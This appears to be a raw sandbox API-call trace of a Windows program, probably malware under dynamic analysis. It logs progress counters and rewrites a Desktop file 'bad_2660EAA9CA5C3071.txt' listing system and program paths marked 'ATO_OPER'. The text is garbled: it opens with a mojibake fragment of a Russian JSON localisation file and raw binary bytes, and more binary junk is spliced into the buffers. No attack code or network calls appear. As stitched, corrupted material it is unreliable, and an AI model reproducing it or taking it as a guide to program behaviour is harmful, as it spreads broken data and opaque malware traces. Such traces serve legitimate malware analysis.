\"3506175733260505131\": {\r\n \"message\": \"Ð\x98Ñ\x81полÑ\x8cзÑ\x83йÑ\x82е длÑ\x8f видеоÑ\x81вÑ\x8fзи канал Ñ\x81 вÑ\x8bÑ\x81окой пÑ\x80опÑ\x83Ñ\x81кной Ñ\x81поÑ\x81обноÑ\x81Ñ\x82Ñ\x8cÑ\x8e. Ð\x92 пÑ\x80оÑ\x82ивном Ñ\x81лÑ\x83Ñ\x87ае полÑ\x8cзоваÑ\x82ели Ñ\x81 медленнÑ\x8bм подклÑ\x8eÑ\x87ением к Ð\x98нÑ\x82еÑ\x80неÑ\x82Ñ\x83 Ñ\x83видÑ\x8fÑ\x82 не вÑ\x81Ñ\x91.\"\r\n },\r\n \"3542042671420335679\": {\r\n m\x16.~Vܳ\x80\x8fô\x97ù1ë¸XÕÙ¹0é\x8b…C\x93Óò·S¹\x80\x8eÌ>#Â[`0)Â\x80\x09\x84µB/\ráÂâÅû7\x13(\x1b\x11\x19", lpUsedDefaultChar=0x0) returned 668 [0171.729] WriteFile (in: hFile=0x20c, lpBuffer=0x2893a98*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x2893a98*, lpNumberOfBytesWritten=0x2a1fe34*=0x29c, lpOverlapped=0x0) returned 1 [0171.731] CloseHandle (hObject=0x20c) returned 1 [0171.731] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3016 / B=10 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0171.731] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3016 / B=10 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa54dc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3016 / B=10 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0171.732] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0171.753] Sleep (dwMilliseconds=0x5dc) [0173.271] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3019 / B=10 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0173.271] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3019 / B=10 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa54dc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3019 / B=10 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0173.271] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0173.292] Sleep (dwMilliseconds=0x5dc) [0174.843] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3088 / B=10 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0174.843] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3088 / B=10 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa54dc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3088 / B=10 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0174.843] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0174.844] Sleep (dwMilliseconds=0x5dc) [0176.631] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.632] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\n", cchWideChar=737, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 737 [0176.632] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\n", cchWideChar=737, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 737 [0176.632] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\n", cchWideChar=737, lpMultiByteStr=0x2663858, cbMultiByte=737, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\n\x04ÊbÂ\x0c\x9d~xdé:ÿÇ:Hé{ô\x82\x90jhÚ\r\x14\x1f[>\x1dß\x04ÏìK¥²\x87\x1f¶ä\x84/­CåçÞ", lpUsedDefaultChar=0x0) returned 737 [0176.632] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x2e1, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2a1fe34*=0x2e1, lpOverlapped=0x0) returned 1 [0176.634] CloseHandle (hObject=0x1dc) returned 1 [0176.634] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3132 / B=11 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0176.634] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3132 / B=11 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa54dc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3132 / B=11 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0176.634] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0176.636] Sleep (dwMilliseconds=0x5dc) [0178.140] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3260 / B=11 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0178.140] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3260 / B=11 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa53fc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3260 / B=11 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0178.140] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0178.141] Sleep (dwMilliseconds=0x5dc) [0179.666] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3347 / B=11 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0179.666] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3347 / B=11 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa53fc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3347 / B=11 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0179.666] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0179.667] Sleep (dwMilliseconds=0x5dc) [0181.211] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3484 / B=11 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0181.211] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3484 / B=11 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa56d4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3484 / B=11 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0181.211] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0181.213] Sleep (dwMilliseconds=0x5dc) [0183.033] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0183.040] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\n", cchWideChar=795, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 795 [0183.040] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\n", cchWideChar=795, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 795 [0183.040] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\n", cchWideChar=795, lpMultiByteStr=0x2885e08, cbMultiByte=795, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\n=VÍ1Q\x0eɶçÀ{§'æºËd\"\x03L\x8d9?~\"Ào®½\x09?ÿµMø®/¼\x0c\x9f½t\x0b>ð\x98\x87\x1f?\x1eàC§\x06ð[\x97Þ\x9e\x01þÔ:À\x87N\rà\x1f=}\r~cõ&|×ÑWà¯~y\x03þ\x9bÿë\x9bð]\x14Íe¹\rò;/a\x1a\x9aÿMÿÿ®\x1a`îbæF«Á`", lpUsedDefaultChar=0x0) returned 795 [0183.040] WriteFile (in: hFile=0x1d8, lpBuffer=0x2885e08*, nNumberOfBytesToWrite=0x31b, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x2885e08*, lpNumberOfBytesWritten=0x2a1fe34*=0x31b, lpOverlapped=0x0) returned 1 [0183.042] CloseHandle (hObject=0x1d8) returned 1 [0183.042] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3520 / B=12 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0183.042] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3520 / B=12 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa54dc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3520 / B=12 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0183.042] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0183.043] Sleep (dwMilliseconds=0x5dc) [0184.550] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3549 / B=12 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0184.550] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3549 / B=12 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa54dc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3549 / B=12 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0184.550] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0184.551] Sleep (dwMilliseconds=0x5dc) [0186.075] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3549 / B=12 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0186.075] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3549 / B=12 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa54dc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3549 / B=12 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0186.075] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0186.751] Sleep (dwMilliseconds=0x5dc) [0189.342] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0189.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\n", cchWideChar=851, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 851 [0189.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\n", cchWideChar=851, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 851 [0189.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\n", cchWideChar=851, lpMultiByteStr=0x2665588, cbMultiByte=851, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program 